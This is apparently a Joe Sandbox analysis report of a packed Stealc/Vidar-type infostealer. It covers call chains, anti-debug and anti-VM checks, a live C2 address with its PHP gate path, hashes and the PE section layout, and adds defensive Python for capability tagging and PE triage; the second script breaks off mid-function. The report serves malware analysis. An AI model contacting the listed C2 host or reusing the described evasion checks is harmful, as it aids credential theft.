                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008545C0 VirtualProtect ?,00000004,00000100,000000001_2_008545C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00869860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869750 mov eax, dword ptr fs:[00000030h]1_2_00869750
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_008678E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7828, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00869600
                Source: file.exe, file.exe, 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: p*Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00867B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00867980
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00867850
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00867A30
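The "Code function" lines in this and the preceding sections summarise, per function of the unpacked image, the Win32 calls the sandbox resolved statically: the FindFirstFileA / StrCmpCA / PathMatchSpecA / CopyFileA / DeleteFileA loops are a file grabber, 1_2_00869600 walks the process list with CreateToolhelp32Snapshot and compares names, 1_2_00867B90 reads the keyboard layouts and locale (the evasive locale chain flagged in the summary), and 1_2_008678E0 / 1_2_00867850 / 1_2_00867980 / 1_2_00867A30 collect computer name, user name, local time and time zone. The behaviour events in the Anti Debugging section (window class names of OllyDbg, Process Monitor, RegMon and FileMon, the SoftICE device names NTICE / SICE / SIWVID, DebugPort queries, HideFromDebugger) and the BIOS and driver registry reads above are the usual packer anti-analysis checks. The Python below is an added example, with tagging rules that are this example's own heuristics, not Joe Sandbox signatures and not code from the sample; it turns both kinds of line into a capability map, and the embedded lines are copied from this report with the link text stripped.

```python
"""Build a capability map from Joe Sandbox 'Code function' call chains and behaviour
events. Added example: the tagging rules are this example's own heuristics, not Joe
Sandbox signatures and not code from the analysed sample."""
import re
from collections import Counter

# Constructed sample: lines copied from the report sections above (link text stripped).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_008638B0",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0085DA80",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00851160 GetSystemInfo,ExitProcess,1_2_00851160",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00869600",
    r"Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00867B90",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00867850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00867850",
    r"Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort",
    r"Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
]

# Function id may lead the chain or only trail it (see 1_2_00867B90 above).
CODE_FN = re.compile(r"Code function: (?:(\d+_\d+_[0-9A-Fa-f]+) )?(.*?),?(\d+_\d+_[0-9A-Fa-f]+)$")
API_NAME = re.compile(r"[A-Za-z][A-Za-z0-9]*")       # rejects decorated C++ names
FINGERPRINT = {"GetComputerName", "GetUserName", "GetLocalTime", "GetTimeZoneInformation",
               "GetSystemInfo", "GetKeyboardLayoutList", "GetLocaleInfo"}
# Each rule is tested against the set of A/W-folded API names of one function.
API_RULES = [
    ("file_enumeration", lambda s: {"FindFirstFile", "FindNextFile"} <= s),
    ("name_filter", lambda s: "FindFirstFile" in s and bool(s & {"StrCmpC", "PathMatchSpec"})),
    ("file_staging", lambda s: "FindFirstFile" in s and "CopyFile" in s),
    ("file_cleanup", lambda s: "FindFirstFile" in s and "DeleteFile" in s),
    ("process_enumeration", lambda s: {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= s),
    ("process_name_match", lambda s: {"Process32Next", "StrCmpC"} <= s),
    ("host_fingerprint", lambda s: bool(s & FINGERPRINT)),
    ("locale_check", lambda s: {"GetKeyboardLayoutList", "GetLocaleInfo"} <= s),
    ("conditional_exit", lambda s: "ExitProcess" in s and bool(s & FINGERPRINT)),
]
ANALYSIS_WINDOWS = {"ollydbg", "procmon_window_class", "regmonclass", "filemonclass", "gbdyllo",
                    "process monitor - sysinternals: www.sysinternals.com",
                    "registry monitor - sysinternals: www.sysinternals.com",
                    "file monitor - sysinternals: www.sysinternals.com"}
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}                 # SoftICE driver device names
VM_REGISTRY_VALUES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}
EVENT_RULES = [
    (re.compile(r"Thread information set: HideFromDebugger"), lambda m: "anti_debug:hide_thread"),
    (re.compile(r"Process queried: DebugPort"), lambda m: "anti_debug:debug_port"),
    (re.compile(r"Open window title or class name: (.+)$"),
     lambda m: "anti_debug:analysis_tool_window" if m.group(1).strip().lower() in ANALYSIS_WINDOWS
     else "window_lookup:" + m.group(1).strip()),
    (re.compile(r"File opened: (\w+)$"),
     lambda m: "anti_debug:softice_device" if m.group(1) in SOFTICE_DEVICES else "file_open:" + m.group(1)),
    (re.compile(r"Registry key queried: .* name: (\w+)$"),
     lambda m: ("anti_vm:registry_" if m.group(1) in VM_REGISTRY_VALUES else "registry_query:") + m.group(1)),
    (re.compile(r"RDTSC instruction interceptor"), lambda m: "anti_vm:rdtsc_timing"),
]


def _base(api):
    """Fold ANSI/Unicode variants: FindFirstFileA -> FindFirstFile."""
    return api[:-1] if len(api) > 3 and api[-1] in "AW" else api


def parse_code_function(line):
    """-> (function id, [api names]) or None for lines that are not call chains."""
    m = CODE_FN.search(line.strip())
    if not m:
        return None
    lead, chain, tail = m.groups()
    tokens = [t.strip().split(" ")[0] for t in chain.split(",") if t.strip()]
    return lead or tail, [_base(t) for t in tokens if API_NAME.fullmatch(t)]


def classify_apis(apis):
    s = set(apis)
    tags = {name for name, rule in API_RULES if rule(s)}
    if {"file_enumeration", "file_staging"} <= tags:
        tags.add("file_grabber")     # walk a directory, match names, copy files out
    return sorted(tags)


def classify_event(line):
    for pattern, tag in EVENT_RULES:
        m = pattern.search(line.strip())
        if m:
            return tag(m)
    return None


def capability_map(lines):
    """-> ({function id: [tags]}, Counter of event tags)."""
    functions, events = {}, Counter()
    for line in lines:
        parsed = parse_code_function(line)
        if parsed:
            functions[parsed[0]] = classify_apis(parsed[1])
        else:
            tag = classify_event(line)
            if tag:
                events[tag] += 1
    return functions, events
```

`capability_map(SAMPLE_LINES)` tags 1_2_008638B0 as the complete grabber (enumerate, filter, stage, clean up) while 1_2_0085DA80 only enumerates and filters, and counts two analysis-tool window lookups, one SoftICE device probe, one DebugPort query and one hidden thread among the events. Rules that fire on real binaries but not on the sample, such as unknown window names, fall through to neutral `window_lookup:` / `file_open:` tags so nothing is silently dropped.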

                Stealing of Sensitive Information

                Source: Yara matchFile source: 1.2.file.exe.850000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 1.2.file.exe.850000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Mitre Att&ck Matrix

                Techniques per tactic, in matrix row order. A bracketed number is the count of signatures matched to that technique; entries without one are unmatched placeholders of the matrix template.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter [2]; Native API [11]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [33]; Disable or Modify Tools [11]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery [2]; Security Software Discovery [641]; Virtualization/Sandbox Evasion [33]; Process Discovery [13]; Account Discovery [1]; System Owner/User Discovery [1]; File and Directory Discovery [1]; System Information Discovery [324]
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel [2]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |

                Dropped Files: No Antivirus matches
                Unpacked PE Files: No Antivirus matches
                Domains: No Antivirus matches

                URLs
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Contacted URLs
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

                URLs from Memory and Binaries
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php5 | file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.3793 | file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phps | file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpYG | file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpW | file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | true | | unknown

                The trailing characters after .php (5, s, YG, W) and after the IP (93) are most likely adjacent memory bytes picked up by the string scan rather than distinct paths; the indicators this report supports are the host 185.215.113.37 and the gate path /e2b1563c6670f193.php, which the associated samples listed further down also contact.
                Contacted IPs
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1528316
                Start date and time: 2024-10-07 19:13:08 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 3m 56s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 6
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 79%
                • Number of executed functions: 18
                • Number of non-executed functions: 85
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed; the report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found
                • VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | xwZfYpo16i.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc | 185.215.113.37/e2b1563c6670f193.php
 | c3KH2gLNrM.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | NHvurkKE21.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | XDPT5mgIBO.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | p7SnjaA8NN.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | xwZfYpo16i.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc | 185.215.113.103
 | c3KH2gLNrM.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.103
 | NHvurkKE21.exe | malicious | Stealc, Vidar | 185.215.113.37
 | XDPT5mgIBO.exe | malicious | Stealc | 185.215.113.37
 | p7SnjaA8NN.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.103
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.946222093655102
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'873'920 bytes
                            MD5:e65a390d1393c0f3cba1b5bfd5bff188
                            SHA1:bc716b7d8d95ffc9eb04dd36e63fc829dc51f3fa
                            SHA256:4911b53e223f5d5d5781b45599cad59b5b2e6d82e03bcd33c7d72f6df95f7488
                            SHA512:221753db8f7d91f911d946ff6be92ebe0705c5da8101a70c749f119b9ad2e3939194d24d51e05c4345020b85aeba313c72d9a2171cf81feea69760075a16df24
                            SSDEEP:24576:co8wAcnerEoBzaE9OHOGoxegW1DFnikBlCtWVhkgOGe+p1mmYADs2+f1mqT:cWn4HL9UObuXVwGeAmiDs2+f7
                            TLSH:FE8533068C9AC719EADD5DF0CFF8629EF4B46A9DE7D2EC61420D022F4829D125C8E635
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xaac000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point 0xaac000, which lies in the .taggant section; consecutive repeats of one instruction are collapsed, and "add byte ptr [eax], al" is how a pair of zero bytes decodes)
jmp 00007F6894C5DCDAh
pcmpeqd mm3, qword ptr [eax+eax]
add byte ptr [eax], al (x2)
jmp 00007F6894C5FCD5h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al (x2)
add byte ptr [eax], dh
add byte ptr [eax], al (x11)
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al (x62)
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al (x2)
adc byte ptr [eax], al
add byte ptr [eax], al (x3)
push es
or al, byte ptr [eax]
add byte ptr [eax], al (x2)
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 900dbf57d3a969b08d5ddf9027074fce | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a9000 | 0x200 | 19607b2bcb55d7aa1abe8561001e350e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
edqomgnb | 0x507000 | 0x1a4000 | 0x1a3600 | 536dbe5a5e9af512081b7c92c4a9ce5a | False | 0.9947850689269747 | data | 7.953527628091509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cxwgayag | 0x6ab000 | 0x1000 | 0x400 | c2902be01ec2f5e4d96b5306c2e17da7 | False | 0.8212890625 | data | 6.275058777690843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6ac000 | 0x3000 | 0x2200 | c93e0de29061c2a1915c1277964be241 | False | 0.05755974264705882 | DOS executable (COM) | 0.7634513999717485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Note: the entry point 0xaac000 is image base 0x400000 plus RVA 0x6ac000, i.e. the first byte of .taggant; five of the seven sections are readable, writable and executable at once; the two unnamed sections map 0x25b000 and 0x2a9000 bytes of virtual space from 0x22800 and 0x200 raw bytes; and edqomgnb holds 1'717'760 of the file's 1'873'920 bytes at an entropy of 7.95. Together these account for the packer-related signatures in the overview (section with special chars, entry point outside standard sections, unpacking that changes section rights).
DLL | Import
kernel32.dll | lstrcpy
Note: lstrcpy is the only static import; every other API is resolved at run time, which matches the LoadLibraryA/GetProcAddress chain in the execution graph and the "Extensive use of GetProcAddress" signature above.
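Read together, the section table, the entry point and the import table describe a packed binary: the entry point is the first byte of .taggant, five sections are writable and executable at the same time, edqomgnb holds most of the file at an entropy close to 8, and only lstrcpy is imported statically. The following Python, added here as an example and not code from Joe Sandbox or from the sample, walks a PE section table with nothing but the standard library and reports those same indicators. build_sample_pe() constructs a small PE32 that mirrors this report's section layout so the script runs offline (it is not the analysed file), and STANDARD_SECTIONS is an assumed list of names a stock linker emits.

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Assumed list of linker-emitted names; random names, an empty name or packer
# markers such as .taggant fall outside it.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                     ".bss", ".tls", ".pdata", ".CRT", ".gfids", ".00cfg", ".didat"}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte (0.0 for empty input); packed or encrypted data sits near 8.0."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                      # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe + 4
    nsect = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                                                 # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                               # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size])})
    return {"entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def triage(data: bytes) -> dict:
    """Static indicators matching the report: entry point outside standard sections,
    writable+executable sections, odd names, packed (high-entropy) sections, and
    executable sections whose mapped size dwarfs their on-disk size (room to unpack into)."""
    pe = parse_pe(data)
    ep = next((s for s in pe["sections"]
               if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], s["raw_size"])), None)
    ep_name = ep["name"] if ep else None
    return {
        "entry_va": pe["image_base"] + pe["entry_rva"],
        "entry_section": ep_name,
        "entry_outside_standard": ep_name not in STANDARD_SECTIONS,
        "rwx_sections": [s["name"] for s in pe["sections"] if (s["chars"] & RWX) == RWX],
        "nonstandard_names": [s["name"] for s in pe["sections"] if s["name"] not in STANDARD_SECTIONS],
        "high_entropy": [s["name"] for s in pe["sections"] if s["entropy"] > 7.0],
        "unpack_targets": [s["name"] for s in pe["sections"]
                           if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["vsize"] > 8 * max(s["raw_size"], 1)],
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the analysed file) reproducing the report's layout: an unnamed
    RWX section, .rsrc, .idata, a random-named high-entropy RWX section and a .taggant
    section holding the entry point (RVA 0x6ac000 + image base 0x400000 = VA 0xaac000)."""
    rng = random.Random(1)
    layout = [  # name, virtual address, virtual size, raw bytes, characteristics
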